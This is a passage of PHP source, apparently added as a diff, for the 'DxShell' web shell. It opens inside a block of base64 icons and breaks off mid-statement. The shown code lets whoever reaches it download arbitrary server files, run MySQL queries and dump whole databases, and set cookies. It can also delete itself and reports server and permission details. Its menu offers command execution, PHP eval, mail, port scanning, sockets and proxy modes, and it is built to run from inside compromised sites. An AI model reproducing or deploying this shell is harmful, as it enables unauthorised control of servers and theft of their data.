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', + 'rename'=> 'R0lGODlhEAAQAJEAAP///wAAAP///wAAACH5BAEAAAIALAAAAAAQABAAAAIxlI8GC+kCQmgPxVmtpBnurnzgxWUk6GFKQp0eFzXnhdHLRm/SPvPp5IodhC4IS8EoAAA7', + 'ed' => 'R0lGODlhEAAQAKIAAAAzZv////3Tm8DAwJ7R/Gmd0P///wAAACH5BAEAAAYALAAAAAAQABAAAANDaAYM+lABIVqEs4bArtRc0V3MMDAEMWLACRSp6kRNYcfrw9h3mksvHm7G4sF8RF3Q1kgqmZSKZ/HKSKeN6I/VdGIZCQA7', + 'downl' => 'R0lGODlhEAAQAJEAADyFFIXQLajcOf///yH5BAEAAAMALAAAAAAQABAAAAI6nAepeY0CI3AHREmNvWLmfXkUiH1clz1CUGoLu0JLwtaxzU5WwK89HxABgESgSFM0fpJHx5DWHCkoBQA7', + 'gzip' => 'R0lGODlhEAAQAKIAAARLsHi+//zZWLJ9DvEZAf///wAAAAAAACH5BAEAAAUALAAAAAAQABAAAANCWLrQDkuMKUC4OMAyiB+Pc0GDYJ7nUFgk6qos56KwJs9m3eLSapc83Q0nnBhDjdGCkcFslgrkEwq9UKHS6dLShCQAADs=', + ); + @ob_clean(); + if ((!isset($_GET['dximg'])) OR (!in_array($_GET['dximg'], array_keys($IMGS)))) $_GET['dximg']='noone'; + header('Cache-Control: public'); + Header('Last-Modified: '.gmdate('D, d M Y H:i:s', time()-60*60*24*365).' GMT'); //Date('r' + header('Expires: '.gmdate('D, d M Y H:i:s', time()+60*60*24*365).' GMT'); + header('Content-type: image/gif'); + print base64_decode( (is_array(($IMGS[$_GET['dximg']])))?$IMGS[$_GET['dximg']][1]:$IMGS[$_GET['dximg']] ); + die(); + } + +if ($_GET['dxmode']=='F_DWN') + { + if (!isset($_GET['dxfile'])) die(DxError('No file selected. Check $_GET[\'dxfile\'] var')); + if (!file_exists($_GET['dxfile'])) die(DxError('No such file')); + if (!is_file($_GET['dxfile'])) die(DxError('Hey! Find out how to read a directory in notepad, and u can call me "Lame" =) ')); + + $DxDOWNLOAD_File=array(); /* prepare struct */ + $DxDOWNLOAD_File['filename']=basename($_GET['dxfile']); + if (isset($_GET['dxparam'])) + $DxDOWNLOAD_File['headers'][]=('Content-type: text/plain'); /* usual look thru */ + else + { $DxDOWNLOAD_File['headers'][]=('Content-type: '.mime_content_type($_GET['dxfile'])); + $DxDOWNLOAD_File['headers'][]=('Content-disposition: attachment; filename="'.basename($_GET['dxfile']).'";'); + } + $DxDOWNLOAD_File['content']=file_get_contents($_GET['dxfile']); + } + +if ($_GET['dxmode']=='SQL' AND isset($_POST['dxparam'])) + {/* download query results */ if (!isset($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'],$_GET['dxsql_d'],$_POST['dxsql_q'])) + die(DxError('Not enough params: $_GET[\'dxsql_s\'],$_GET[\'dxsql_l\'],$_GET[\'dxsql_p\'],$_GET[\'dxsql_d\'],$_POST[\'dxsql_q\'] needed')); + + if ((mysql_connect($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'])===FALSE) or (mysql_errno()!=0)) + die(DxError('No connection to mysql server!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error())); + if (!mysql_select_db($_GET['dxsql_d'])) + die(DxError('Can\'t select database!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error())); + + /* export as csv */ + $DxDOWNLOAD_File=array(); /* prepare struct */ + $DxDOWNLOAD_File['filename']='Query_'.$_GET['dxsql_s'].'_'.$_GET['dxsql_d'].'.csv'; + $DxDOWNLOAD_File['headers'][]=('Content-type: text/comma-separated-values'); + $DxDOWNLOAD_File['headers'][]=('Content-disposition: attachment; filename="'.$DxDOWNLOAD_File['filename'].'";'); + $DxDOWNLOAD_File['content']=''; + + $_POST['dxsql_q']=explode(';',$_POST['dxsql_q']); + + for ($q=0;$q<count($_POST['dxsql_q']);$q++) + { if (empty($_POST['dxsql_q'][$q])) continue; + $num=DxMySQL_FetchResult(DxMySQLQ($_POST['dxsql_q'][$q], false), $DUMP, false); + $DxDOWNLOAD_File['content'].="\n\n".'QUERY: '.str_replace(array("\n",";"), array('',"<-COMMA->"), str_replace("\r",'', $_POST['dxsql_q'][$q] )).";"; + if ($num<=0) {$DxDOWNLOAD_File['content'].="\n".'Empty;'; continue;} + foreach ($DUMP[0] as $key => $val) $DxDOWNLOAD_File['content'].=$key.";"; /* headers */ + for ($l=0;$l<count($DUMP);$l++) + { $DxDOWNLOAD_File['content'].="\n"; + $INDEXES=array_keys($DUMP[$l]); + for ($i=0; $i<count($INDEXES); $i++) + $DxDOWNLOAD_File['content'].=str_replace(array("\n",";"), array('',"<-COMMA->"), str_replace("\r",'', $DUMP[$l][ $INDEXES[$i] ])).";"; + + } + } + } + +if ($_GET['dxmode']=='SQLD' AND isset($_POST['dxsql_tables'])) + { if (!isset($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'],$_GET['dxsql_d'],$_POST['dxsql_tables'])) + die(DxError('Not enough params: $_GET[\'dxsql_s\'],$_GET[\'dxsql_l\'],$_GET[\'dxsql_p\'],$_GET[\'dxsql_d\'],$_POST[\'dxsql_tables\'] needed')); + + if ((mysql_connect($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'])===FALSE) or (mysql_errno()!=0)) + die(DxError('No connection to mysql server!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error())); + if (!mysql_select_db($_GET['dxsql_d'])) + die(DxError('Can\'t select database!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error())); + + if (empty($_POST['dxsql_tables'])) die(DxError('No tables selected...')); + + $DxDOWNLOAD_File=array(); /* prepare struct */ + $DxDOWNLOAD_File['filename']='Dump_'.$_GET['dxsql_s'].'_'.$_GET['dxsql_d'].'.sql'; + $DxDOWNLOAD_File['headers'][]=('Content-type: text/plain'); + $DxDOWNLOAD_File['headers'][]=('Content-disposition: attachment; filename="'.$DxDOWNLOAD_File['filename'].'";'); + $DxDOWNLOAD_File['content']=''; + + $DxDOWNLOAD_File['content'].="\n\t".'/* '.str_repeat('=', 66); + $DxDOWNLOAD_File['content'].="\n\t".'==== MySQL Dump '.DxDate(time()).' - DxShell v'.$GLOB['SHELL']['Ver'].' by o_O Tync'; + $DxDOWNLOAD_File['content'].="\n\t".'==== Server: '.$_GET['dxsql_s']; + $DxDOWNLOAD_File['content'].="\n\t".'==== DB: '.$_GET['dxsql_d']; + $DxDOWNLOAD_File['content'].="\n\t".'==== Tables: '."\n\t\t\t".implode(', '."\n\t\t\t", $_POST['dxsql_tables']); + $DxDOWNLOAD_File['content'].="\n\t".str_repeat('=', 66).' */'; + + if (!empty($_POST['dxsql_q'])) + { $_POST['dxsql_q']=explode(';', $_POST['dxsql_q']); + foreach ($_POST['dxsql_q'] as $CUR) + if (empty($CUR)) continue; else DxMySQLQ($CUR, true); /* pre-query */ + } + + foreach ($_POST['dxsql_tables'] as $CUR_TABLE) + { $DxDOWNLOAD_File['content'].=str_repeat("\n", 5).'/* '.str_repeat('-', 40).' */'; + DxMySQL_FetchResult(DxMySQLQ('SHOW CREATE TABLE `'.$CUR_TABLE.'`;', false), $DUMP, true); + $DxDOWNLOAD_File['content'].="\n".$DUMP[0][1]; + $DxDOWNLOAD_File['content'].="\n\n"; + DxMySQL_FetchResult(DxMySQLQ('SELECT * FROM `'.$CUR_TABLE.'`;', false), $DUMP, true); + for ($i=0; $i<count($DUMP); $i++) + { + for ($j=0;$j<count($DUMP[$i]);$j++) $DUMP[$i][$j]=mysql_real_escape_string($DUMP[$i][$j]); + $DxDOWNLOAD_File['content'].="\n".'INSERT INTO `'.$CUR_TABLE.'` VALUES ("'.implode('", "', $DUMP[$i]).'");'; + } + } + } + +if ($_GET['dxmode']=='COOK' AND isset($_POST['dxparam'])) + { foreach ($_POST['dxparam'] as $name => $val) + { if ($name=='DXS_NEWCOOK') + { + if (empty($val['NAM']) or empty($val['VAL'])) continue; DxSetCookie($val['NAM'], $val['VAL'], time()+60*60*24*10); + } + else DxSetCookie($name, $val, (empty($val))?1:(time()+60*60*24*10)); + } + DxGotoURL(DxURL('leave', 'dxmode')); + die(); + } + +if (isset($_GET['dxinstant'])) + { $_GET['dxinstant']=strtoupper($_GET['dxinstant']); + if ($_GET['dxinstant']=='DEL') + { + $ok=@unlink(@substr(@strrchr($_SERVER['PHP_SELF'],"/"),1)); + print '<script>window.alert("SELF '.( ($ok)?'deleted. Reload the page to believe me =)':'tried to delete but was unsuccessful' ).'");</script>'; + } + } + +function DxObGZ($s) {return gzencode($s);} + +if (isset($DxDOWNLOAD_File)) + {/* File downloader for everything */ + if (!$DXGLOBALSHIT) + { + if ($GLOB['SYS']['GZIP']['CanOutput']) + { + ini_set('output_buffering',4096); + ob_start("DxObGZ"); + header('Content-Encoding: gzip'); + } for ($i=0; $i<count($DxDOWNLOAD_File['headers']); $i++) header($DxDOWNLOAD_File['headers'][$i]); + print $DxDOWNLOAD_File['content']; + die(); + } + /* if u want to download file when $DXGLOBALSHIT, scroll down */ + } + +################################################################################### +####################++++++++++++++# M A I N #++++++++++++++++++#################### +################################################################################### +if (!in_array($_GET['dxmode'], array_keys($GLOB['DxMODES']))) die(DxError('Unknown $_GET[\'dxmode\']! check $GLOB[\'DxMODES\'] array')); + +######## +######## Main HAT (blackhat? =))) ) +######## +if (!in_array($_GET['dxmode'], array_keys($GLOB['DxMODES']))) die('Unknown $_GET[\'dxmode\']'); + +if ($DXGLOBALSHIT) + print str_repeat("\n", 20).'<!--SHELL HERE-->'; +?> +<html><head><title><?=$_SERVER['HTTP_HOST'];?> --= DxShell 1.0 - by o_O Tync =-- :: <?=$GLOB['DxMODES'][$_GET['dxmode']];?></title> +<Meta Http-equiv="Content-Type" Content="text/html; Charset=windows-1251"> +<link rel="shortcut icon" href="<?=DxURL('kill','dxmode');?>&dxmode=IMG&dximg=DxS"> +<style> +img {border-width:0pt;} +body, td {font-size: 10pt; color: #00B000; background-color: #000000; font-family: Arial;padding:2pt;margin:2pt; vertical-align:top;} +h1 {font-size: 14pt; color: #00B000; background-color: #002000; font-family: Arial Black; font-weight: bold; text-align: center;} +h2 {font-size: 12pt; color: #00B000; background-color: #002000; font-family: Courier New; text-align: center;} +h3 {font-size: 12pt; color: #F0F000; background-color: #002000; font-family: Times New Roman; text-align: center;} +caption {font-size: 12pt; color: #00FF00; background-color: #000000; font-family: Times New Roman; text-align:center; border-width: 1pt 3pt 1pt 3pt;border-color:#FFFF00;border-style:solid solid dotted solid;padding: 5pt 0pt;} +td.h2_oneline {font-size: 12pt; color: #00B000; font-family: Courier New; text-align: center;background-color: #002000; border-right-color:#00FF00;border-right-width:1pt;border-right-style:solid;vertical-align:middle;} +td.mode_header {font-size: 16pt; color: #FFFF00; font-family: Courier New; text-align: center;background-color: #002000; vertical-align:middle;} +table.outset, td.outset {border-width:3pt; border-style:outset; border-color: #004000;margin-top: 2pt;vertical-align:middle;} +table.bord, td.bord, fieldset {border-width:1pt; border-style:solid; border-color: #003000;vertical-align:middle;} +hr {border-width:1pt; border-style:solid; border-color: #005000; text-align: center; width: 90%;} +textarea.bout {border-color: #000000; border-width:0pt; background: #000000; font: 12px verdana, arial, helvetica, sans-serif; color: #00FF00; Scrollbar-Face-color:#000000;Scrollbar-Track-Color: #000000;} +td.listing {background-color: #000500; font-family: Courier New; font-size:8pt; color:#00B000; border-color: #003000;border-width:1pt; border-style:solid; border-collapse:collapse;padding:0pt 3pt;vertical-align:top;} +td.linelisting {background-color: #000500; font-family: Courier New; font-size:8pt; color:#00B000; border-color: #003000;border-width:1pt 0pt; border-style:solid; border-collapse:collapse;padding:0pt 3pt;vertical-align:middle;} +table.linelisting {border-color: #003000;border-width:0pt 1pt; border-style:solid;} +td.js_floatwin_header {background-color:#003300;font-size:10pt;font-weight:bold;color:#FFFF00;border-color: #00FF00;border-width:1pt; border-style:solid;border-collapse:collapse;} +td.js_floatwin_body {background-color:#000000;font-size:10pt;color:#00B000;border-color: #00FF00;border-width:1pt; border-style:solid;border-collapse:collapse;} +font.rwx_sticky_bit {color:#FF0000;} +.highlight_txt {color: #FFFF00;} +.achtung {color: #000000; background-color: #FF0000; font-family: Arial Black; font-size: 14pt; padding:0pt 5pt;} + +input {font-size: 10pt;font-family: Arial; color: #E0E000; background-color: #000000; border-color:#00FF00 #005000 #005000 #FFFF00; border-width:1pt 1pt 1pt 3pt;border-style:dotted dotted dotted solid; padding-left: 3pt;overflow:hidden;} +input.radio {border-width:0pt;color: #FFFF00;} +input.submit {font-size: 12pt;font-family: Impact, Arial Black; color :#00FF00; background-color: #002000; border-color: #00FF00; border-width:0pt 1pt 1pt 0pt; border-style: solid; padding:1pt;letter-spacing:1pt;padding:0pt 2pt;} +input.bt_Yes {font-size: 14pt;font-family: Impact, Arial Black; color :#00FF00; background-color: #005000; border-color: #005000 #005000 #00FF00 #005000; border-width:1pt 1pt 2pt 1pt; border-style: dotted dotted solid dotted; height: 30pt; padding:10pt; margin: 5pt 10pt;} +input.bt_No {font-size: 14pt;font-family: Impact, Arial Black; color :#FF0000; background-color: #500000; border-color: #500000 #500000 #FF0000 #500000; border-width:1pt 1pt 2pt 1pt; border-style: dotted dotted solid dotted; height: 30pt; padding:10pt; margin: 5pt 10pt;} +input.bt_Yes:Hover {color:#000000; background-color:#00FF00;border-bottom-color:#FFFFFF;} +input.bt_No:Hover {color:#000000; background-color:#FF0000;border-bottom-color:#FFFFFF;} +textarea {color:#00FF00; background-color:#001000;border-color:#000000;border-width:0pt;border-style:solid;font-size:10pt;font-family:Arial;Padding:5pt; + Scrollbar-Face-Color: #00FF00; Scrollbar-Track-Color: #000500; + Scrollbar-Highlight-Color: #00A000; Scrollbar-3dlight-Color: #00A000; Scrollbar-Shadow-Color: #005000; + Scrollbar-Darkshadow-Color: #005000;} +select {background-color:#001000;color:#00D000;border-color:#D0D000;border-width:1pt;border-style:solid dotted dotted solid;} + +A:Link, A:Visited { color: #00D000; text-decoration: underline; } +A.no:Link, A.no:Visited { color: #00D000; text-decoration: none; } +A:Hover, A:Visited:Hover , A.no:Hover, A.no:Visited:Hover { color: #00FF00; background-color:#003300; text-decoration: overline; } +.Hover:Hover {color: #FFFF00; cursor:help;} +.HoverClick:Hover {color: #FFFF00; cursor:crosshair;} +span.margin {margin: 0pt 10pt;} +td.error {color:#000000; background-color: #FF0000; font-weight: bold; font-size: 11pt;} +td.warning {color:#000000; background-color: #D00000; font-size: 11pt;} +font.img_replacer {margin:1pt;padding:1pt;text-decoration: none;border-width:1pt;border-color:#D0D000;border-style:solid;} +</style> + +<?php +if (in_array($_GET['dxmode'], array('UPL', 'DIR', 'PRT'))) + { /* THIS FLOATING WINDOW IS ONLY SET FOR MODES: */?> +<SCRIPT> +var dom = document.getElementById?1:0; +var ie4 = document.all && document.all.item; +var opera = window.opera; //Opera +var ie5 = dom && ie4 && !opera; +var nn4 = document.layers; +var nn6 = dom && !ie5 && !opera; +var vers=parseInt(navigator.appVersion); +var good_browser = (ie5 || ie4); +function showwin(hdr,txt,w,vis) +{ +if(good_browser) + { + var obj = document.all('js_floatwin'); + var evnt = event; + var xOffset = document.body.scrollLeft; + var yOffset = document.body.scrollTop; + + var temp = + "<TABLE BORDER=0 CELLSPACING=0 CELLPADDING=0 WIDTH="+ w +">" + +((hdr!='')?("<TR><TD class=js_floatwin_header>"+ hdr + "</TD></TR>"):"") + +"<TR><TD class=js_floatwin_body>" + txt + "</TD></TR>" + +"</TABLE>"; + + if (vis == 1) + { + obj.innerHTML = temp; + obj.style.width = w; + hor = document.body.scrollWidth - obj.offsetWidth; + posHor = xOffset + evnt.clientX + 10; + posHor2 = xOffset + evnt.clientX - obj.offsetWidth - 5; + posVer = yOffset + evnt.clientY - obj.offsetHeight - 5; + + if (posHor<hor) + obj.style.posLeft = posHor + else + obj.style.posLeft = posHor2; + + obj.style.posTop = posVer; + + obj.style.visibility = "visible"; + } + else + { + obj.style.visibility = "hidden"; + obj.style.posTop = 0; + obj.style.posLeft = 0; + } + } +} +function movewin() +{ +if (good_browser) + { + var obj = document.all('js_floatwin'); + var evnt = event; + var xOffset = document.body.scrollLeft; + var yOffset = document.body.scrollTop; + + hor = document.body.scrollWidth - obj.offsetWidth; + posHor = xOffset + evnt.clientX + 10; + posHor2 = xOffset + evnt.clientX - obj.offsetWidth - 5; + posVer = yOffset + evnt.clientY - obj.offsetHeight - 5; + + if (posHor<hor) + obj.style.posLeft = posHor + else + obj.style.posLeft = posHor2; + + obj.style.posTop = posVer; + } +} +</SCRIPT> +<?php } /* /END */?> + +</head> +<body> +<?php +if ($DXGLOBALSHIT) /* tries to kill all the fucking bug.php pre-output, if ob_clean() failed */ + { print str_repeat("\n", 10).'<!--SHIT KILLER-->'; + print "\n".'</body></a>'.str_repeat('</table>', 5).str_repeat('</div>', 5).str_repeat('</span>', 5).str_repeat('</pre>', 1).str_repeat('</font>', 5).str_repeat('</script>', 2); + print "\n".'<TABLE WIDTH=100% BORDER=0 style="position:absolute;z-index:100;top:0pt;left:0pt;width:100%;height:100%;"><tr><td>'; + print "\n\n\n\n"; + } +?> + +<div id="js_floatwin" style="z-index:50;position:absolute;left:0;top:0;visibility:hidden"></div> +<table width=100% cellspacing=0 cellpadding=0 class=outset> +<tr> + <td width=100pt class=h2_oneline><a href="<?=DxURL('kill', '');?>&dxmode=WTF" class=no><h1>DxShell<br>v<?=$GLOB['SHELL']['Ver'];?></td> + <td> +<?php +print "\n".'<div style="margin-right:'.( ((strlen($GLOB['SHELL']['USER']['Login'])+strlen($GLOB['SHELL']['USER']['Passw']))>=2)?'100':'30' ).'pt;">'; +print "\n".( ($DXGLOBALSHIT)?'<font color=#FF0000><b>GLOBALSHIT</b></font> ; ':'' ); +print "\n".DxPrint_ParamState('php_ver', phpversion() ).' ; '; +print "\n".DxPrint_ParamState('php_Safe_Mode', $GLOB['PHP']['SafeMode'], '!' ).' ; '; +print "\n".DxPrint_ParamState('magic_quotes', (bool)get_magic_quotes_gpc(), '!' ).' ; '; +print "\n".DxPrint_ParamState('gZip', function_exists('gzencode') ).' ; '; +print "\n".DxPrint_ParamState('cURL', function_exists('curl_version') ).' ; '; +print "\n".DxPrint_ParamState('MySQL', function_exists('mysql_connect') ).' ; '; +print "\n".DxPrint_ParamState('MsSQL', function_exists('mssql_connect') ).' ; '; +print "\n".DxPrint_ParamState('PostgreSQL', function_exists('pg_connect') ).' ; '; +print "\n".DxPrint_ParamState('Oracle', function_exists('ocilogon') ).' ; '; +print "\n".'Disabled functions: '.((($df=@ini_get('disable_functions'))=='')?'<font color=#00FF00><b>NONE</b></font>':'<font color=#FF0000><b>'.str_replace(array(',',';'), ', ', $df).'</b></font>'); +print "\n".'</div>'; + +print "\n\n".'<span align=right style="position:absolute;z-index:1;right:0pt;top:0pt;"><table><tr><td class="h2_oneline"><nobr>'; +if ((strlen($GLOB['SHELL']['USER']['Login'])+strlen($GLOB['SHELL']['USER']['Passw']))>=2) + print "\n".'<a href="'.DxURL('kill', 'dxinstant').'&dxinstant=logoff" title="Log Off" class=no>[Exit]</a>'; +print "\n".'<a href="'.DxURL('kill', 'dxinstant').'&dxinstant=DEL" title="Delete self ('.basename($_SERVER['PHP_SELF']).')" class=no><font color=#FF0000;>'.DxImg('del').'</font></a>'; +print "\n".'</nobr></td></tr></table></span>'; + +print "\n\n".'<hr>'; +print "\n".'Disk free: <b>'.DxStr_FmtFileSize(disk_free_space($GLOB['FILES']['CurDIR'])).' / '.DxStr_FmtFileSize(disk_total_space($GLOB['FILES']['CurDIR'])).'</b> ; '; +print "\n".'OS: <b>'.$GLOB['SYS']['OS']['id'].' ('.$GLOB['SYS']['OS']['Full'].' )</b> ; '; +print "\n".'Yer_IP: <b>'.@$_SERVER['REMOTE_ADDR'].' ('.@$_SERVER['REMOTE_HOST'].')</b> ; '; +print "\n".'<nobr>Own/U/G/Pid/Inode:<wbr><b>'.get_current_user().' / '.getmyuid().' / '.getmygid().' / '.getmypid().' / '.getmyinode().'</b> ; </nobr>'; +print "\n".'MySQL : <b>'.@mysql_get_server_info().'</b> ; '; +print "\n".'<br>'.@$_SERVER['SERVER_SOFTWARE']; +?> + </td> +</table> +<table width=100% cellspacing=0 cellpadding=0 class=outset> +<tr> + <td width=100pt class=h2_oneline><h2>Modes</td> + <td style="text-align:center;"><nobr> + <a href="<?=DxURL('kill', '');?>&dxmode=DIR">DIR</a> | + <a href="<?=DxURL('kill', '');?>&dxmode=F_VIEW">VIEW</a> | + <a href="<?=DxURL('kill', '');?>&dxmode=FTP<?=((!empty($_GET['dxdir']))?'&dxdir='.$_GET['dxdir']:'');?>">FTP</a> + <td><font class=highlight_txt><big><b>II</td><td style="text-align:center;"><nobr> + <a href="<?=DxURL('leave', 'dxsql_s,dxsql_l,dxsql_p,dxsql_d');?>&dxmode=SQL">SQL</a> | + <a href="<?=DxURL('kill', '');?>&dxmode=PHP">PHP</a> | + <a href="<?=DxURL('kill', '');?>&dxmode=COOK">COOKIE</a> | + <a href="<?=DxURL('kill', '');?>&dxmode=CMD">CMD</a> + <td><font class=highlight_txt><big><b>II</td><td style="text-align:center;"><nobr> + <a href="<?=DxURL('kill', '');?>&dxmode=MAIL">MAIL</a> | + <a href="<?=DxURL('kill', '');?>&dxmode=STR">STR</a> | + <a href="<?=DxURL('kill', '');?>&dxmode=PRT">PORTSCAN</a> | + <a href="<?=DxURL('kill', '');?>&dxmode=SOCK">SOCK</a> | + <a href="<?=DxURL('kill', '');?>&dxmode=PROX">PROXY</a> + </td> + </tr> +</table> + +<?php $DX_Header_drawn=true; ?> + +<?php +################################################# +######## +######## DXGLOBALSHIT DOWNLOADER +######## +if (isset($DxDOWNLOAD_File)) /* only when DXGLOBALSHIT is enabled */ + { print "\n".'<table align=center><tr><td class=mode_header><b>Download file</td></tr></table>'; + print "\n".'The fact you see this means that "'.basename($_SERVER['PHP_SELF']).'" has fucked up the output with it\'s shit, so no headerz could be sent =(('; + print "\n".'<br>Exclusively, DxShell is proud to present an additional way to download files...Just execute the php-script given below, and it will make the file u\'re trying to download'; + + if ($GLOB['SYS']['GZIP']['CanUse']) $DxDOWNLOAD_File['content']=gzcompress($DxDOWNLOAD_File['content'], 6); + + print "\n\n".'<br><br>'; + print "\n".'<textarea rows=30 style="width:90%" align=center>'; + print "\n".'<?php'."\n".' //Execute this, and you\'ll get the requested "'.$DxDOWNLOAD_File['filename'].'" in the same folder with the script ;)'; + print "\n".'// The file is '.( ($GLOB['SYS']['GZIP']['CanUse'])?'gzcompress()ed and':'' ).' base64_encode()ed'; + print "\n\n".'$encoded_file=\''.base64_encode($DxDOWNLOAD_File['content']).'\';'; + print "\n\n\n\n"; + print "\n".'$f=fopen(\''.$DxDOWNLOAD_File['filename'].'\', \'w\');'; + print "\n".'fputs($f, '.( 